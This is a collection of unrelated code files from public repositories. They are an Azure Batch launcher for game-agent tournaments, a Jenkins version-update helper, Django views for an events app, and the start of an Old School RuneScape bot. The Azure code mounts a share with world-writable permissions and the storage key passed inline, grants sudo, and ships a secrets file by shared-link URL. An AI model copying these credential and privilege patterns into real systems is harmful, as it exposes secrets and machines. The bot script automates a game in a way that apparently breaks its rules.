],\n\n\n start_task=batchmodels.StartTask(\n command_line=helpers.wrap_commands_in_shell('linux', [\n 'whoami',\n 'usermod -aG sudo azureuser', # Run the setup scripts as ROOT and add azureuser to the sudoers file\n 'apt-get install software-properties-common',\n # causes issues if this is run as azureuser? see: https://askubuntu.com/questions/1109982/e-could-not-get-lock-var-lib-dpkg-lock-frontend-open-11-resource-temporari\n 'apt-add-repository universe',\n 'apt-get update',\n 'apt-get update && apt-get install cifs-utils && sudo mkdir -p /mnt/PolycraftFileShare',\n f'mount -t cifs //polycrafttournamentdata.file.core.windows.net/pal-sift /mnt/PolycraftFileShare -o vers=3.0,username={self.global_config.get(\"Storage\", \"storageaccountname\")},password={self.global_config.get(\"Storage\", \"storageaccountkey\")},dir_mode=0777,file_mode=0777,serverino && ls /mnt/PolycraftFileShare',\n 'mkdir ~/matlab && cp /mnt/PolycraftFileShare/setup/MATLAB_Runtime_R2020a_Update_2_glnxa64.zip ~/matlab/',\n 'cd ~/matlab',\n 'apt install unzip -y',\n 'unzip MATLAB_Runtime_R2020a_Update_2_glnxa64.zip',\n './install -mode silent -agreeToLicense yes',\n 'export LD_LIBRARY_PATH=/usr/local/MATLAB/MATLAB_Runtime/v98/runtime/glnxa64:/usr/local/MATLAB/MATLAB_Runtime/v98/bin/glnxa64:/usr/local/MATLAB/MATLAB_Runtime/v98/sys/os/glnxa64:/usr/local/MATLAB/MATLAB_Runtime/v98/extern/bin/glnxa64${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}',\n # 'sudo apt-get install -y python3-pip'\n ]),\n # TODO: include add'l resource files for initial startup\n wait_for_success=True,\n # user_accounts=users,\n user_identity=batchmodels.UserIdentity(\n # user_name='azureuser',\n auto_user=batchmodels.AutoUserSpecification(\n scope=batchmodels.AutoUserScope.pool,\n elevation_level=batchmodels.ElevationLevel.admin)\n # ),\n\n ),\n\n ),\n )\n\n helpers.create_pool_if_not_exist(batch_client, pool)\n\n def submit_job_and_add_task(self, batch_client, block_blob_client, job_id, pool_id):\n \"\"\"Submits a job to the Azure Batch service and adds\n a task that runs a python script.\n\n :param batch_client: The batch client to use.\n :type batch_client: `batchserviceclient.BatchServiceClient`\n :param block_blob_client: The storage block blob client to use.\n :type block_blob_client: `azure.storage.blob.BlockBlobService`\n :param str job_id: The id of the job to create.\n :param str pool_id: The id of the pool to use.\n \"\"\"\n job = batchmodels.JobAddParameter(\n id=job_id,\n pool_info=batchmodels.PoolInformation(pool_id=pool_id),\n on_all_tasks_complete='terminateJob',\n )\n\n batch_client.job.add(job)\n\n block_blob_client.create_container(\n _CONTAINER_NAME,\n fail_on_exist=False)\n\n # os.chdir('../output/')\n count = 0\n maxCount = 1 # TODO: move this.\n for file in os.listdir(f'{self.library_of_tournaments}'):\n if count >= maxCount and DEBUG_FLAG:\n break\n if not file.endswith(\".zip\"):\n continue\n filename = file.split('.')[0]\n\n # Get commands\n cmds = self.agent_commands.get_task_commands(file, filename, self.suffix)\n\n application_package_references = [\n # batchmodels.ApplicationPackageReference(application_id=APPLICATION_ID, version=APPLICATION_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=TUFT_APPLICATION_ID, version=TUFT_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=GT_APP_ID, version=GT_APPLICATION_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=SRI_APP_ID, version=SRI_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=GT_HUGA_APP_ID, version=GT_HUGA_APP_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=GT_HUGA_MLAB_APP_ID,\n # version=GT_HUGA_MLAB_APP_VERSION),\n # batchmodels.ApplicationPackageReference(application_id=GT_PLAN_APP_ID,\n # version=GT_PLAN_APPLICATION_VERSION),\n batchmodels.ApplicationPackageReference(application_id=RAYTHEON_APP_ID, version=RAYTHEON_VERSION),\n ]\n\n user_identity = batch.models.UserIdentity(\n # user_name='azureuser',\n auto_user=batch.models.AutoUserSpecification(\n scope=batch.models.AutoUserScope.pool,\n elevation_level=batch.models.ElevationLevel.admin)\n )\n\n sas_url = helpers.upload_blob_and_create_sas(\n block_blob_client,\n _CONTAINER_NAME,\n 'inputs-test/' + file,\n self.library_of_tournaments + file,\n datetime.datetime.utcnow() + datetime.timedelta(weeks=2))\n\n setup_url = helpers.upload_blob_and_create_sas(\n block_blob_client,\n _CONTAINER_NAME,\n \"setup_azure_batch_initial.sh\",\n 'setup_azure_batch_initial.sh',\n datetime.datetime.utcnow() + datetime.timedelta(weeks=2))\n\n secret_url = helpers.upload_blob_and_create_sas(\n block_blob_client,\n _CONTAINER_NAME,\n \"secret_real.ini\",\n '../secret_real.ini',\n datetime.datetime.utcnow() + datetime.timedelta(weeks=2))\n\n sri_url = helpers.upload_blob_and_create_sas(\n block_blob_client,\n _CONTAINER_NAME,\n \"sri_run.sh\",\n '../sri_run.sh',\n datetime.datetime.utcnow() + datetime.timedelta(weeks=2))\n\n sift_wrap = helpers.upload_blob_and_create_sas(\n block_blob_client,\n _CONTAINER_NAME,\n \"agents/sift_tournament_agent_launcher.sh\",\n '../sift_tournament_agent_launcher.sh',\n datetime.datetime.utcnow() + datetime.timedelta(weeks=2))\n\n constraint = batchmodels.TaskConstraints(\n retention_time=datetime.timedelta(minutes=1440),\n )\n\n task = batchmodels.TaskAddParameter(\n id=f\"Tournament-{str(count)}-{filename}\",\n command_line=helpers.wrap_commands_in_shell('linux', cmds),\n constraints=constraint,\n resource_files=[\n batchmodels.ResourceFile(\n file_path=file,\n http_url=sas_url),\n batchmodels.ResourceFile(\n file_path='setup/' + 'setup_azure_batch_initial.sh',\n http_url=setup_url),\n batchmodels.ResourceFile(\n file_path='setup/' + 'sri_run.sh',\n http_url=sri_url),\n batchmodels.ResourceFile(\n file_path='secret_real.ini',\n http_url=secret_url),\n batchmodels.ResourceFile(\n file_path='setup/' + 'sift_tournament_agent_launcher.sh',\n http_url=sift_wrap),\n ],\n application_package_references=application_package_references,\n user_identity=user_identity)\n\n batch_client.task.add(job_id=job.id, task=task)\n\n count += 1\n\n def execute_sample(self):\n \"\"\"Executes the sample with the specified configurations.\n\n :param global_config: The global configuration to use.\n :type global_config: `configparser.ConfigParser`\n :param sample_config: The sample specific configuration to use.\n :type sample_config: `configparser.ConfigParser`\n \"\"\"\n # Set up the configuration\n batch_account_key = self.global_config.get('Batch', 'batchaccountkey')\n batch_account_name = self.global_config.get('Batch', 'batchaccountname')\n batch_service_url = self.global_config.get('Batch', 'batchserviceurl')\n\n storage_account_key = self.global_config.get('Storage', 'storageaccountkey')\n storage_account_name = self.global_config.get('Storage', 'storageaccountname')\n storage_account_suffix = self.global_config.get(\n 'Storage',\n 'storageaccountsuffix')\n storage_account_connection_string = self.global_config.get('Storage', 'storageconnectionstring')\n\n should_delete_container = self.global_config.getboolean(\n 'DEFAULT',\n 'shoulddeletecontainer')\n should_delete_job = self.global_config.getboolean(\n 'DEFAULT',\n 'shoulddeletejob')\n should_delete_pool = self.global_config.getboolean(\n 'DEFAULT',\n 'shoulddeletepool')\n pool_vm_size = self.global_config.get(\n 'DEFAULT',\n 'poolvmsize')\n pool_vm_count = self.global_config.getint(\n 'DEFAULT',\n 'poolvmcount')\n\n # Print the settings we are running with\n helpers.print_configuration(self.global_config)\n # helpers.print_configuration(sample_config)\n\n credentials = batchauth.SharedKeyCredentials(\n batch_account_name,\n batch_account_key)\n batch_client = batch.BatchServiceClient(\n credentials,\n batch_url=batch_service_url)\n\n # Retry 5 times -- default is 3\n batch_client.config.retry_policy.retries = 5\n\n # azureblob.BlobServiceClient()\n\n block_blob_client = azureblob.BlockBlobService(\n account_name=storage_account_name,\n account_key=storage_account_key,\n endpoint_suffix=storage_account_suffix)\n # https://pal.centralus.batch.azure.com\n\n # block_blob_client = azureblob.BlobServiceClient.from_connection_string(\n # storage_account_connection_string)\n\n job_id = helpers.generate_unique_resource_name(\n f\"{self.agent_name}_Tournaments\")\n pool_id = self.pool\n # try:\n self.create_pool(\n batch_client,\n block_blob_client,\n pool_vm_size,\n pool_id,\n pool_vm_count,\n )\n\n self.submit_job_and_add_task(\n batch_client,\n block_blob_client,\n job_id,\n pool_id,\n )\n\n # helpers.wait_for_tasks_to_complete(\n # batch_client,\n # job_id,\n # datetime.timedelta(minutes=180))\n\n tasks = batch_client.task.list(job_id)\n task_ids = [task.id for task in tasks]\n print(task_ids)\n # helpers.print_task_output(batch_client, job_id, task_ids)\n # finally:\n # # clean up\n # if should_delete_container:\n # block_blob_client.delete_container(\n # _CONTAINER_NAME,\n # fail_not_exist=False)\n # if should_delete_job:\n # print(\"Deleting job: \", job_id)\n # batch_client.job.delete(job_id)\n # if should_delete_pool:\n # print(\"Deleting pool: \", pool_id)\n # batch_client.pool.delete(pool_id)\n\n\ndef launch_tournament_wrapper(agent, agentType, test_type, global_config, pool, suffix, tournament_directory, ):\n \"\"\"\n Launch Script to kick off a series of Tournaments for a given Agent in a named pool\n Launch ALl tournaments that belong in the same pool using this function\n\n :param agent: Agent Name (Note: this will create a new Table and View if the agent doesn't already exist)\n :param agentType: Agent Type (Enum - see AgentBatchCommands for valid options)\n :param test_type: See Enum\n :param global_config: Global Config parser object - make sure to create a file called AzureBatch.cfg\n :param pool: name of pool to be created\n :param suffix: Tournament Name suffix (usually, date and hour of execution)\n :param tournament_directory: Location within which to search for all tournament zips\n I.e., all_tournaments_provided/pogo/ will get the zips from all of the sub folders for the right game type\n (i.e. all zips inside a X1000/ folder if TestType.Stage6 is passed in)\n\n \"\"\"\n\n tournaments_to_launch = get_tournaments(test_type, tournament_directory)\n for folder in tournaments_to_launch:\n # pass\n agent_pool = AzureBatchLaunchTournaments(agent, agentType, folder, global_config, pool, suffix)\n agent_pool.execute_sample()\n\n\ndef get_tournaments(test_type,tournament_directory):\n \"\"\"\n Helper script to iterate through a tournament directory and get all tournament zips of a particular test type\n (i.e. ,TestType.Stage6 will return any zip file within an X1000/ folder.\n :param test_type: Testing Stage - see Enum\n :param tournament_directory: Folder within which to search for zips recursively.\n :return: A list of zips (each zip file is a tournament that will become a task to complete in the parent pool)\n \"\"\"\n\n output = []\n for subdir, folders, files in os.walk(f'{tournament_directory}'):\n for file in files:\n if file.endswith('.zip') and test_type.value in file:\n print(f'{subdir}/{file}')\n zip = f'{subdir}/{file}'\n output.append(f'{subdir}/')\n\n output = list(set(output))\n return output\n\ndef launch_pools_per_novelty(agent, agentType, test_type, global_config, pool, suffix, tournament_directory, ):\n r=f'{os.getcwd()}/{tournament_directory}'\n pools = {f'{a}': f'{r}/{a}/' for a in os.listdir(r) if not '.' in a}\n print(pools)\n for pool_name, tournaments in pools.items():\n tournaments_to_launch = get_tournaments(test_type, f'{tournament_directory}{pool_name}/')\n print(f\"pool name: {pool}{pool_name}\")\n print(tournaments_to_launch)\n for folder in tournaments_to_launch:\n # pass\n agent_pool = AzureBatchLaunchTournaments(agent, agentType, folder, global_config, f\"{pool}{pool_name}\", suffix)\n agent_pool.execute_sample()\n\n\nfrom enum import Enum\n\nclass TestType(Enum):\n STAGE4 = \"X0010\"\n STAGE5 = \"X0100\"\n STAGE6 = \"X1000\"\n\n\n\nif __name__ == '__main__':\n global_config = configparser.ConfigParser()\n global_config.read(helpers._SAMPLES_CONFIG_FILE_NAME)\n #\n global_config.set('DEFAULT', 'poolvmcount', '5')\n\n # launch_pools_per_novelty(\n # \"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_\",\n # suffix=\"_062622\",\n # tournament_directory=\"../tournaments/old/tufts_0626_launch/\",\n # )\n huga_files = \"C:\\\\Users\\\\DhruvNarayanan\\\\Polycraft World\\\\Polycraft World (Internal) - Documents\\\\05. SAIL-ON Program\\\\00. 06-12 Months\\\\98. 12M Tournament Files\\\\huga-6M-tournaments-zipped\\\\HUGA_L00_T01_S01\"\n\n launch_tournament_wrapper(\n \"RAYTHEON_AGENT_V1\",\n AgentType.RAYTHEON,\n TestType.STAGE5,\n global_config,\n pool=\"RAYTHEON_AGENT_TEST_X100_V1\",\n suffix=\"_110820\",\n tournament_directory=huga_files,\n )\n\n # launch_tournament_wrapper(\"GT_AGENT_POGO_PLAN_V1\",\n # AgentType.GT_POGO_PLAN_BASELINE,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_GT_PLAN_R2_L1T2\",\n # suffix=\"_062622\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/pogo/POGO_L01_T01_S01_AXE/\",\n # )\n #\n # launch_tournament_wrapper(\"GT_AGENT_POGO_PLAN_V1\",\n # AgentType.GT_POGO_PLAN_BASELINE,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_GT_PLAN_R2_L2\",\n # suffix=\"_062622\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/pogo/POGO_L02_T01_S01_TREES/\",\n # )\n #\n #\n # launch_tournament_wrapper(\"GT_AGENT_POGO_PLAN_V1\",\n # AgentType.GT_POGO_PLAN_BASELINE,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_GT_PLAN_R2_L3\",\n # suffix=\"_062622\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/pogo/POGO_L03_T01_S01_FAKE_RECIPE_O/\",\n # )\n\n # launch_tournament_wrapper(\"GT_AGENT_POGO_PLAN_V1\"\n # AgentType.GT_POGO_PLAN_BASELINE,\n #\n # )\n\n # global_config.set('DEFAULT', 'poolvmcount', '12')\n # #\n # launch_tournament_wrapper(\"GT_HUGA_MLAB_V1\",\n # AgentType.GT_HG_BASELINE_MATLAB,\n # TestType.STAGE5,\n # global_config,\n # pool=\"HUGA_GT_MLAB_L1\",\n # suffix=\"_062422\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/huga/HUGA_L01_T02_S02_DETRITUS/\")\n #\n # launch_tournament_wrapper(\"GT_HUGA_MLAB_V1\",\n # AgentType.GT_HG_BASELINE_MATLAB,\n # TestType.STAGE5,\n # global_config,\n # pool=\"HUGA_GT_MLAB_L2\",\n # suffix=\"_062422\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/huga/HUGA_L02_T01_S01_WALL_COLOR/\")\n #\n # launch_tournament_wrapper(\"GT_HUGA_MLAB_V1\",\n # AgentType.GT_HG_BASELINE_MATLAB,\n # TestType.STAGE5,\n # global_config,\n # pool=\"HUGA_GT_MLAB_L3\",\n # suffix=\"_062422\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/huga/HUGA_L03_T01_S01_SCREEN_FLIP/\")\n\n # #\n # launch_tournament_wrapper(\"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_R2_L1\",\n # suffix=\"_062221\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/pogo/POGO_L01_T01_S01_AXE/\",\n # )\n\n # launch_tournament_wrapper(\"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_R2_L2\",\n # suffix=\"_062221\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/pogo/POGO_L02_T01_S01_TREES/\",\n # )\n #\n\n # launch_tournament_wrapper(\"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_VIRGIN_X100\",\n # suffix=\"_062322\",\n # tournament_directory=\"../tournaments/unknown_all_tournaments_to_TA2/pogo/POGO_L03_T01_S01_FAKE_RECIPE_O/\",\n # )\n\n # launch_tournament_wrapper(\"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_VIRGIN_X100\",\n # suffix=\"_062322\",\n # tournament_directory=\"../tournaments/pogo_no_novelty/\",\n # )\n\n # global_config.set('DEFAULT', 'poolvmcount', '16')\n\n # launch_tournament_wrapper(\n # agent=\"SIFT_AGENT_TEST_V6\",\n # agentType=AgentType.SIFT,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_SIFT_L1_T1_6\",\n # suffix=\"_062611\",\n # tournament_directory=\"../tournaments/old/pogo_lvl1a/\",\n # )\n\n # launch_tournament_wrapper(\n # agent=\"SIFT_AGENT_TEST_V6\",\n # agentType=AgentType.SIFT,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_SIFT_L1_T1_6b\",\n # suffix=\"_062611\",\n # tournament_directory=\"../tournaments/old/pogo_lvl1b/\",\n # )\n\n # global_config.set('DEFAULT', 'poolvmcount', '18')\n #\n # launch_tournament_wrapper(\n # agent=\"SIFT_AGENT_TEST_V6\",\n # agentType=AgentType.SIFT,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_SIFT_L2_T1_6\",\n # suffix=\"_062611\",\n # tournament_directory=\"../tournaments/old/pogo_lvl2a/\",\n # )\n #\n # launch_tournament_wrapper(\n # agent=\"SIFT_AGENT_TEST_V6\",\n # agentType=AgentType.SIFT,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_SIFT_L2_T1_6b\",\n # suffix=\"_062611\",\n # tournament_directory=\"../tournaments/old/pogo_lvl2b/\",\n # )\n #\n # launch_tournament_wrapper(\n # agent=\"SIFT_AGENT_TEST_V6\",\n # agentType=AgentType.SIFT,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_SIFT_L3_T1_6\",\n # suffix=\"_062611\",\n # tournament_directory=\"../tournaments/old/pogo_lvl3a/\",\n # )\n #\n # launch_tournament_wrapper(\n # agent=\"SIFT_AGENT_TEST_V6\",\n # agentType=AgentType.SIFT,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_SIFT_L3_T1_6b\",\n # suffix=\"_062611\",\n # tournament_directory=\"../tournaments/old/pogo_lvl3b/\",\n # )\n\n # launch_tournament_wrapper(\n # agent=\"TUFTS_AGENT_TEST_V3\",\n # agentType=AgentType.TUFTS,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_TUFTS_L2_T7\",\n # suffix=\"_062522\",\n # tournament_directory=\"../tournaments/pogo_l2_t7/\",\n # )\n\n # launch_tournament_wrapper(\n # \"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_X100_1a\",\n # suffix=\"_062423\",\n # tournament_directory=\"../tournaments/pogo_lvl1a/\",\n # )\n\n # global_config.set('DEFAULT', 'poolvmcount', '12')\n\n # launch_tournament_wrapper(\n # \"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_X100_3a\",\n # suffix=\"_062423\",\n # tournament_directory=\"../tournaments/pogo_lvl3a/\",\n # )\n #\n # launch_tournament_wrapper(\n # \"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_X100_3b\",\n # suffix=\"_062423\",\n # tournament_directory=\"../tournaments/pogo_lvl3b/\",\n # )\n #\n # global_config.set('DEFAULT', 'poolvmcount', '18')\n #\n # launch_tournament_wrapper(\n # \"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_X100_1b\",\n # suffix=\"_062423\",\n # tournament_directory=\"../tournaments/pogo_lvl1b/\",\n # )\n # #\n # launch_tournament_wrapper(\n # \"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_X100_2a\",\n # suffix=\"_062423\",\n # tournament_directory=\"../tournaments/pogo_lvl2a/\",\n # )\n #\n # launch_tournament_wrapper(\n # \"TUFTS_AGENT_TEST_V3\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_X100_2b\",\n # suffix=\"_062423\",\n # tournament_directory=\"../tournaments/pogo_lvl2b/\",\n # )\n\n # launch_tournament_wrapper(\n # agent=\"SRI_AGENT_TEST_V2\",\n # agentType=AgentType.SRI,\n # test_type=TestType.STAGE6,\n # global_config=global_config,\n # pool=\"HUGA_SRI_VIRGIN_1000\",\n # suffix=\"_061913\",\n # tournament_directory=\"../tournaments/all_tournaments_to_TA2/huga/HUGA_L00_T01_S01_VIRGIN/\",\n # )\n\n\n #\n # launch_tournament_wrapper(\n # agent=\"SIFT_AGENT_TEST_V5\",\n # agentType=AgentType.SIFT,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_SIFT_X100_TREES2\",\n # suffix=\"_061619\",\n # tournament_directory=\"../tournaments/all_tournaments_to_TA2/pogo/POGO_L02_T01_S01_TREES/\",\n #\n # )\n #\n # launch_tournament_wrapper(\n # agent=\"SIFT_AGENT_TEST_V5\",\n # agentType=AgentType.SIFT,\n # test_type=TestType.STAGE5,\n # global_config=global_config,\n # pool=\"POGO_SIFT_X100_AXE2\",\n # suffix=\"_061619\",\n # tournament_directory=\"../tournaments/all_tournaments_to_TA2/pogo/POGO_L01_T01_S01_AXE/\",\n #\n # )\n\n\n # launch_tournament_wrapper( \"SIFT_AGENT_TEST_V4\",\n # AgentType.SIFT,\n # TestType.STAGE6,\n # global_config,\n # pool=\"POGO_SIFT_X1000_VIRGIN\",\n # suffix=\"_061114\",\n # tournament_directory=\"../tournaments/all_tournaments_to_TA2/pogo/POGO_L00_T01_S01_VIRGIN/\",\n # )\n #\n\n #\n # launch_tournament_wrapper(\"TUFTS_AGENT_TEST_02\",\n # AgentType.TUFTS,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_TUFTS_X100_EMH\",\n # suffix=\"_061001\",\n # tournament_directory=\"../tournaments/EMH_pogo_provided/\",\n # )\n # launch_tournament_wrapper(\"GT_AGENT_2_TEST_V3\",\n # AgentType.GT_POGO_BASELINE,\n # TestType.STAGE5,\n # global_config,\n # pool=\"POGO_GT_L2_X100_POOL\",\n # suffix=\"_060911\",\n # tournament_directory=\"../tournaments/g10/pogo/\",\n # )\n\n # launch_tournament_wrapper( \"GT_Trained_HUGA_1_V1\",\n # AgentType.GT_HG_BASELINE,\n # TestType.STAGE5,\n # global_config,\n # pool=\"HUGA_X100_POOL_GT\",\n # suffix=\"_060821\",\n # tournament_directory=\"../tournaments/g10/HUGA_L00_T01_S01_VIRGIN/\",\n # )\n\n\n","repo_name":"StephenGss/PAL","sub_path":"AzureBatch/AzureBatchLaunchTournaments.py","file_name":"AzureBatchLaunchTournaments.py","file_ext":"py","file_size_in_byte":34273,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"24672011013","text":"\"\"\"Helper for Jenkins pipeline deployments.\"\"\"\n\nimport argparse\nimport configparser\nimport json\nimport subprocess\nimport sys\n\n\ndef git_resolve(url, version):\n if len(version) == 40:\n # revision.\n try:\n int(version, 16)\n except ValueError:\n pass\n else:\n return version\n # Symbolic name?\n cmd = subprocess.Popen(\n [\"git\", \"ls-remote\", url, version + \"^{}\"], stdout=subprocess.PIPE\n )\n stdout, stderr = cmd.communicate()\n # if its not a tag, start another more generic attempt\n if not stdout:\n cmd = subprocess.Popen(\n [\"git\", \"ls-remote\", url, version], stdout=subprocess.PIPE\n )\n stdout, stderr = cmd.communicate()\n stdout = stdout.decode(\"ascii\")\n return stdout.split(\"\\t\", 1)[0]\n\n\nclass VersionsUpdater:\n UPDATERS = {\n \"git-resolve\": \"update_git\",\n \"pass\": \"update_pass_value\",\n }\n\n def __init__(self, versions_file, version_mapping_json):\n self.version_mapping = json.loads(version_mapping_json)\n self.versions_file = versions_file\n self.config = configparser.ConfigParser()\n self.config.read(self.versions_file)\n\n def __call__(self):\n for service, version in sorted(self.version_mapping.items()):\n if not version:\n # leave empty to keep current version\n continue\n self.update(service, version)\n\n with open(self.versions_file, \"w\") as f:\n self.config.write(f)\n # Remove the trailing newline, which pre-commit doesn't like:\n f.truncate(f.tell() - 1)\n\n def update(self, service, version):\n update_mode = self.config[service].get(\"update\", \"git-resolve\")\n update_mode = update_mode.split(\":\", 1)\n mode = update_mode[0]\n args = \"\".join(update_mode[1:])\n\n func = getattr(self, self.UPDATERS[mode])\n func(service, version, args)\n\n def update_git(self, service, version, extra_args):\n resolved = git_resolve(self.config.get(service, \"url\"), version)\n if not resolved:\n raise ValueError(\n \"%s: Could not resolve version %s.\" % (service, version)\n )\n log(\"%s: resolved version %s to: %s\", service, version, resolved)\n self.config.set(service, \"revision\", resolved)\n self.config.set(service, \"version\", version)\n\n def update_pass_value(self, service, version, extra_args):\n self.config[service][extra_args] = version\n\n\ndef log(msg, *args):\n print(msg % args)\n sys.stdout.flush()\n\n\ndef list_components(versions_file, verbose=False):\n config = configparser.SafeConfigParser()\n config.read(versions_file)\n components = sorted(config.sections())\n if verbose:\n result = []\n for component in components:\n c = dict(config.items(component))\n c[\"name\"] = component\n result.append(c)\n else:\n result = components\n\n print(json.dumps(result, sort_keys=True))\n\n\ndef set_versions(versions_file, version_mapping_json):\n vu = VersionsUpdater(versions_file, version_mapping_json)\n vu()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n\n p = subparsers.add_parser(\n \"list-components\",\n help=\"List available components where versions can be set\",\n )\n p.add_argument(\n \"-v\",\n \"--verbose\",\n action=\"store_true\",\n help=\"Return all options from versions.ini, not only component names\",\n )\n p.add_argument(\"versions_file\", help='Name of \"versions.ini\"')\n p.set_defaults(func=list_components)\n\n p = subparsers.add_parser(\"set-versions\", help=\"Update versions\")\n p.add_argument(\n \"versions_file\",\n help=\"Name of versions.ini. If exists it will be overwritten.\",\n )\n p.add_argument(\n \"version_mapping_json\", help=\"JSON: mapping of service: version\"\n )\n p.set_defaults(func=set_versions)\n\n args = parser.parse_args()\n func_args = dict(args._get_kwargs())\n del func_args[\"func\"]\n return args.func(**func_args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"flyingcircusio/batou_ext","sub_path":"src/batou_ext/jenkins.py","file_name":"jenkins.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"73062533867","text":"# -*- coding: utf-8 -*-\nfrom django.contrib.auth import views\nfrom django.template.response import TemplateResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\n\nfrom .models import Event, Engineer, Phone, Step\nfrom .forms import EventForm\nfrom .forms import ACTIVE_CHOICES\n\n\ndef user_login(request):\n \"\"\"\n Login func\n \"\"\"\n if request.user.is_authenticated():\n return TemplateResponse(request, 'ams/already_logged.html')\n else:\n return views.login(request, template_name='ams/login.html')\n\n\ndef user_logout(request):\n \"\"\"\n Logout func\n \"\"\"\n if request.user.is_authenticated():\n return views.logout(request, next_page=reverse('ams:goodbye'))\n else:\n return TemplateResponse(request, 'ams/not_logged.html')\n\n\n@login_required(login_url='/ams/accounts/login/')\ndef default(request):\n \"\"\"\n Show default AMS page.\n \"\"\"\n if request.method == 'GET':\n form = EventForm(request.GET)\n\n choice = request.GET.get('choice')\n if (choice is None or len(choice) == 0 or\n choice not in [i[0].decode('utf-8') for i in ACTIVE_CHOICES]):\n\n choice = 'Открыто'\n\n try:\n displayed = int(request.GET.get('displayed'))\n except (ValueError, TypeError):\n displayed = 5\n\n if choice and displayed:\n event = (Event.objects.filter(state__title__contains=choice)\n .order_by('-publication_datetime')[0:displayed])\n count = len(Event.objects.filter(state__title__contains=choice))\n return TemplateResponse(request, 'ams/default_ams.html', locals())\n\n\n@login_required(login_url='/ams/accounts/login/')\ndef detail(request, id):\n \"\"\"\n Showing event details\n \"\"\"\n event = Event.objects.filter(id=id)\n step = Step.objects.filter(event=event)\n engineer = Engineer.objects.filter(event=event)\n return TemplateResponse(request, 'ams/detail_ams.html', locals())\n\n\n@login_required(login_url='/ams/accounts/login/')\ndef detail_engineer(request, id):\n \"\"\"\n Showing engineer details\n \"\"\"\n engineer = Engineer.objects.filter(id=id)\n phone = Phone.objects.filter(ams_engineer_related=engineer)\n return TemplateResponse(request, 'ams/detail_engineer_ams.html', locals())\n\n\n@login_required(login_url='/ams/accounts/login/')\ndef detail_step(request, id):\n \"\"\"\n Showing step details\n \"\"\"\n step = Step.objects.filter(id=id)\n engineer = Engineer.objects.filter(step=step)\n return TemplateResponse(request, 'ams/detail_step.html', locals())\n","repo_name":"cmltaWt0/django-ams","sub_path":"ams/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"92663312","text":"import datetime\n\nimport keyboard\n\n\nimport osrs\n\nminimum_eat_health = 35\nfood_to_eat = [7946, 379, 361]\nport = '56800'\nnmz_to_bank = [\n '2615,3111,0',\n '2613,3102,0',\n '2605,3097,0'\n]\n\n\ndef main():\n start_time = datetime.datetime.now() - datetime.timedelta(hours=1)\n script_start = datetime.datetime.now()\n while True:\n q = {\n 'interactingWith': True,\n 'skills': ['hitpoints'],\n 'inv': True,\n 'playerWorldPoint': True\n }\n data = osrs.server.query_game_data(q, port)\n if 'playerWorldPoint' in data and data['playerWorldPoint']['z'] < 3:\n script_start = osrs.game.break_manager(script_start, 30, 35, 320, 508, 'pass_71', False, port)\n print('Dead, re supplying.')\n osrs.clock.random_sleep(3, 3.1)\n bank_and_return()\n print('Starting new 